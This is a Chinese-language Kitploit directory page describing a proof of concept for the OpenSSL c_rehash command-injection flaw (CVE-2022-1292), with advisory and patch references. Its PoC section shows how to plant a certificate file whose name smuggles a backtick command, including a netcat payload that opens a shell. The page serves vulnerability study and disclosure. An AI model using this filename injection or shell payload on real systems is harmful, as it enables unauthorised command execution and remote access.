Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-1292 — CVE-2022-1292 OpenSSL c_rehash Vulnerability - POC | Kitploit
工具/GitHubGitHub/alcaparra/cve-2022-1292
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlLearning & EducationPayload Development
GitHubalcaparra/cve-2022-1292

CVE-2022-1292

CVE-2022-1292 OpenSSL c_rehash Vulnerability - POC

查看仓库
2884年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1292 POC

POC Screenshot

描述

root@kitploit:~
c_rehash 脚本未能正确清理 shell 元字符以防止命令注入。
某些操作系统在分发此脚本时,会使其自动执行。
在这些操作系统上,攻击者可以以脚本的权限执行任意命令。
使用 c_rehash 脚本被认为已过时,应替换为 OpenSSL rehash 命令行工具。

此脚本由 update-ca-certificates(来自 ca-certificates 包)执行,
用于重新哈希 /etc/ssl/certs/ 中的证书。能够在
此目录中放置文件的攻击者可以以脚本的权限执行任意命令。

命令注入的发生是因为文件名未正确清理:

  • $fname =~ s/'/'\\''/g;
  • my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`;

脚本的这一部分存在漏洞,因为关闭反引号后可以执行命令。例如,一个名为 MyCert.crt`whoami` 的文件会运行 "whoami"。

POC

  1. 导航到 /etc/ssl/certs/(默认)或 update-ca-certificates 配置的其他路径
  2. echo "-----BEGIN CERTIFICATE-----" > "hey.crt\`nc -c sh 127.0.0.1 12345\`" (nc 作为 payload 示例)
  3. 然后等待执行 update-ca-certificates。你可以手动触发:c_rehash .

参考

  • https://www.cvedetails.com/cve/CVE-2022-1292/
  • https://www.debian.org/security/2022/dsa-5139
  • https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html
  • https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2
  • https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23
  • https://www.openssl.org/news/secadv/20220503.txt
下载工具